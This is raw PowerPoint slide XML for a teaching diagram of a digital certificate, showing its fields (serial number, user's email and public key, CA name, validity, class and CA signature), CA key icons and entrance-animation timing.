            <a:xfrm>
              <a:off x="133208" y="2271324"/>
              <a:ext cx="1164975" cy="6537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lgn="l" defTabSz="1300480">
                <a:defRPr sz="2400">
                  <a:latin typeface="Times New Roman"/>
                  <a:ea typeface="Times New Roman"/>
                  <a:cs typeface="Times New Roman"/>
                  <a:sym typeface="Times New Roman"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr sz="1800"/>
                <a:t>User’s </a:t>
              </a:r>
              <a:endParaRPr sz="1800"/>
            </a:p>
            <a:p>
              <a:pPr algn="l" defTabSz="1300480">
                <a:defRPr sz="2400">
                  <a:latin typeface="Times New Roman"/>
                  <a:ea typeface="Times New Roman"/>
                  <a:cs typeface="Times New Roman"/>
                  <a:sym typeface="Times New Roman"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr sz="1800"/>
                <a:t>Public Key</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="982" name="CA’s Name"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="133208" y="3029937"/>
              <a:ext cx="1190425" cy="3870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1800">
                  <a:latin typeface="Times New Roman"/>
                  <a:ea typeface="Times New Roman"/>
                  <a:cs typeface="Times New Roman"/>
                  <a:sym typeface="Times New Roman"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr>
                <a:defRPr sz="2400"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1800"/>
                <a:t>CA’s Name</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="983" name="Validity"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="349955" y="4547164"/>
              <a:ext cx="866612" cy="3870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1800">
                  <a:latin typeface="Times New Roman"/>
                  <a:ea typeface="Times New Roman"/>
                  <a:cs typeface="Times New Roman"/>
                  <a:sym typeface="Times New Roman"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr>
                <a:defRPr sz="2400"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1800"/>
                <a:t>Validity</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="984" name="Digital…"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="241582" y="5197404"/>
              <a:ext cx="1133163" cy="9204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lgn="l" defTabSz="1300480">
                <a:defRPr sz="2400">
                  <a:latin typeface="Times New Roman"/>
                  <a:ea typeface="Times New Roman"/>
                  <a:cs typeface="Times New Roman"/>
                  <a:sym typeface="Times New Roman"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr sz="1800"/>
                <a:t>Digital </a:t>
              </a:r>
              <a:endParaRPr sz="1800"/>
            </a:p>
            <a:p>
              <a:pPr algn="l" defTabSz="1300480">
                <a:defRPr sz="2400">
                  <a:latin typeface="Times New Roman"/>
                  <a:ea typeface="Times New Roman"/>
                  <a:cs typeface="Times New Roman"/>
                  <a:sym typeface="Times New Roman"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr sz="1800"/>
                <a:t>Signature </a:t>
              </a:r>
              <a:endParaRPr sz="1800"/>
            </a:p>
            <a:p>
              <a:pPr algn="l" defTabSz="1300480">
                <a:defRPr sz="2400">
                  <a:latin typeface="Times New Roman"/>
                  <a:ea typeface="Times New Roman"/>
                  <a:cs typeface="Times New Roman"/>
                  <a:sym typeface="Times New Roman"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr sz="1800"/>
                <a:t>of CA</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="985" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="24835" y="3571804"/>
              <a:ext cx="1702366" cy="1"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="12700" cap="flat">
              <a:solidFill>
                <a:srgbClr val="808080"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="t">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l" defTabSz="650240">
                <a:defRPr sz="1600">
                  <a:latin typeface="Helvetica"/>
                  <a:ea typeface="Helvetica"/>
                  <a:cs typeface="Helvetica"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="986" name="Certificate…"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="241582" y="3571804"/>
              <a:ext cx="1221678" cy="6537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lgn="l" defTabSz="1300480">
                <a:defRPr sz="2400">
                  <a:latin typeface="Times New Roman"/>
                  <a:ea typeface="Times New Roman"/>
                  <a:cs typeface="Times New Roman"/>
                  <a:sym typeface="Times New Roman"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr sz="1800"/>
                <a:t>Certificate </a:t>
              </a:r>
              <a:endParaRPr sz="1800"/>
            </a:p>
            <a:p>
              <a:pPr algn="l" defTabSz="1300480">
                <a:defRPr sz="2400">
                  <a:latin typeface="Times New Roman"/>
                  <a:ea typeface="Times New Roman"/>
                  <a:cs typeface="Times New Roman"/>
                  <a:sym typeface="Times New Roman"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr sz="1800"/>
                <a:t>Class</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="987" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="24835" y="1079217"/>
              <a:ext cx="1702366" cy="1"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="12700" cap="flat">
              <a:solidFill>
                <a:srgbClr val="808080"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="t">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l" defTabSz="650240">
                <a:defRPr sz="1600">
                  <a:latin typeface="Helvetica"/>
                  <a:ea typeface="Helvetica"/>
                  <a:cs typeface="Helvetica"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="988" name="User’s Email…"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="24835" y="1295964"/>
              <a:ext cx="1395584" cy="6537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lgn="l" defTabSz="1300480">
                <a:defRPr sz="2400">
                  <a:latin typeface="Times New Roman"/>
                  <a:ea typeface="Times New Roman"/>
                  <a:cs typeface="Times New Roman"/>
                  <a:sym typeface="Times New Roman"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr sz="1800"/>
                <a:t>User’s Email</a:t>
              </a:r>
              <a:endParaRPr sz="1800"/>
            </a:p>
            <a:p>
              <a:pPr algn="l" defTabSz="1300480">
                <a:defRPr sz="2400">
                  <a:latin typeface="Times New Roman"/>
                  <a:ea typeface="Times New Roman"/>
                  <a:cs typeface="Times New Roman"/>
                  <a:sym typeface="Times New Roman"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr sz="1800"/>
                <a:t>Address</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="989" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="24835" y="537351"/>
              <a:ext cx="1702366" cy="1"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="12700" cap="flat">
              <a:solidFill>
                <a:srgbClr val="808080"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="t">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l" defTabSz="650240">
                <a:defRPr sz="1600">
                  <a:latin typeface="Helvetica"/>
                  <a:ea typeface="Helvetica"/>
                  <a:cs typeface="Helvetica"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="990" name="Serial No."/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="241582" y="103857"/>
              <a:ext cx="1069650" cy="3870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1800">
                  <a:latin typeface="Times New Roman"/>
                  <a:ea typeface="Times New Roman"/>
                  <a:cs typeface="Times New Roman"/>
                  <a:sym typeface="Times New Roman"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr>
                <a:defRPr sz="2400"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1800"/>
                <a:t>Serial No.</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="994" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7651918" y="3485981"/>
            <a:ext cx="1947292" cy="1589476"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1947291" cy="1589475"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="992" name="Key_Public01" descr="Key_Public01"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId7">
              <a:extLst/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="806027" cy="1589476"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="993" name="Public Key"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="813887" y="69358"/>
              <a:ext cx="1133405" cy="7384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9014" tIns="39014" rIns="39014" bIns="39014" numCol="1" anchor="t">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle>
              <a:lvl1pPr algn="l" defTabSz="1300480">
                <a:defRPr sz="2200">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr>
                <a:defRPr sz="2400"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="2200"/>
                <a:t>Public Key</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="995" name="CA Private Key"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7063705" y="6351476"/>
            <a:ext cx="1277903" cy="751130"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{C572A759-6A51-4108-AA02-DFA0A04FC94B}">
              <ma14:wrappingTextBoxFlag xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="39014" tIns="39014" rIns="39014" bIns="39014">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1300480">
              <a:defRPr sz="2400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>CA </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200"/>
              <a:t>Private Key</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="996" name="Key_Private01" descr="Key_Private01"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7332792" y="7065200"/>
            <a:ext cx="756357" cy="1526259"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="997" name="Key_Public01" descr="Key_Public01"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7858855" y="7394836"/>
            <a:ext cx="806027" cy="1589476"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="998" name="CA Public Key"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8672741" y="7464195"/>
            <a:ext cx="1300481" cy="751130"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{C572A759-6A51-4108-AA02-DFA0A04FC94B}">
              <ma14:wrappingTextBoxFlag xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="39014" tIns="39014" rIns="39014" bIns="39014">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" defTabSz="1300480">
              <a:defRPr sz="2400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>CA </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200"/>
              <a:t>Public Key</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1001" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4029548" y="4745095"/>
            <a:ext cx="1417886" cy="2643859"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1417884" cy="2643857"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="999" name="Oval"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="1417885" cy="2643858"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="CCFFCC"/>
            </a:solidFill>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="88900" dist="25400" dir="13500000">
                <a:srgbClr val="7A997A"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="1300480">
                <a:defRPr b="1" sz="1800">
                  <a:latin typeface="Arial"/>
                  <a:ea typeface="Arial"/>
                  <a:cs typeface="Arial"/>
                  <a:sym typeface="Arial"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1000" name="Signed…"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="137693" y="595700"/>
              <a:ext cx="1142499" cy="14524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3217" tIns="63217" rIns="63217" bIns="63217" numCol="1" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="1300480">
                <a:defRPr sz="2400">
                  <a:latin typeface="Times New Roman"/>
                  <a:ea typeface="Times New Roman"/>
                  <a:cs typeface="Times New Roman"/>
                  <a:sym typeface="Times New Roman"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr b="1" sz="1800">
                  <a:latin typeface="Arial"/>
                  <a:ea typeface="Arial"/>
                  <a:cs typeface="Arial"/>
                  <a:sym typeface="Arial"/>
                </a:rPr>
                <a:t>Signed </a:t>
              </a:r>
              <a:endParaRPr b="1" sz="1800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr defTabSz="1300480">
                <a:defRPr sz="2400">
                  <a:latin typeface="Times New Roman"/>
                  <a:ea typeface="Times New Roman"/>
                  <a:cs typeface="Times New Roman"/>
                  <a:sym typeface="Times New Roman"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr b="1" sz="1800">
                  <a:latin typeface="Arial"/>
                  <a:ea typeface="Arial"/>
                  <a:cs typeface="Arial"/>
                  <a:sym typeface="Arial"/>
                </a:rPr>
                <a:t>by using</a:t>
              </a:r>
              <a:endParaRPr b="1" sz="1800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr defTabSz="1300480">
                <a:defRPr sz="2400">
                  <a:latin typeface="Times New Roman"/>
                  <a:ea typeface="Times New Roman"/>
                  <a:cs typeface="Times New Roman"/>
                  <a:sym typeface="Times New Roman"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr b="1" sz="1800">
                  <a:latin typeface="Arial"/>
                  <a:ea typeface="Arial"/>
                  <a:cs typeface="Arial"/>
                  <a:sym typeface="Arial"/>
                </a:rPr>
                <a:t>CA’s</a:t>
              </a:r>
              <a:endParaRPr b="1" sz="1800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr defTabSz="1300480">
                <a:defRPr sz="2400">
                  <a:latin typeface="Times New Roman"/>
                  <a:ea typeface="Times New Roman"/>
                  <a:cs typeface="Times New Roman"/>
                  <a:sym typeface="Times New Roman"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr b="1" sz="1800">
                  <a:latin typeface="Arial"/>
                  <a:ea typeface="Arial"/>
                  <a:cs typeface="Arial"/>
                  <a:sym typeface="Arial"/>
                </a:rPr>
                <a:t>private</a:t>
              </a:r>
              <a:endParaRPr b="1" sz="1800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr defTabSz="1300480">
                <a:defRPr sz="2400">
                  <a:latin typeface="Times New Roman"/>
                  <a:ea typeface="Times New Roman"/>
                  <a:cs typeface="Times New Roman"/>
                  <a:sym typeface="Times New Roman"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr b="1" sz="1800">
                  <a:latin typeface="Arial"/>
                  <a:ea typeface="Arial"/>
                  <a:cs typeface="Arial"/>
                  <a:sym typeface="Arial"/>
                </a:rPr>
                <a:t>key</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1002" name="Key_Public01" descr="Key_Public01"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="719687" y="4653288"/>
            <a:ext cx="806028" cy="1589477"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003" name="CA Public Key"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1533574" y="4722647"/>
            <a:ext cx="1300481" cy="751129"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{C572A759-6A51-4108-AA02-DFA0A04FC94B}">
              <ma14:wrappingTextBoxFlag xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="39014" tIns="39014" rIns="39014" bIns="39014">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" defTabSz="1300480">
              <a:defRPr sz="2400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>CA </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200"/>
              <a:t>Public Key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956"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wipe(left)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="956"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="8" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="9" presetClass="entr" nodeType="afterEffect" presetSubtype="0" presetID="1" grpId="2" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="10" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9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3" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="14" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="964"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="964"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="16" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="17" presetClass="entr" nodeType="afterEffect" presetSubtype="0" presetID="1" grpId="4" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="18" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="974"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="19" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="20" presetClass="entr" nodeType="afterEffect" presetSubtype="0" presetID="1" grpId="5" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="21" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="991"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="22" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="23" presetClass="entr" nodeType="afterEffect" presetSubtype="0" presetID="1" grpId="6" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="24" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10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91" grpId="5"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="994" grpId="2"/>
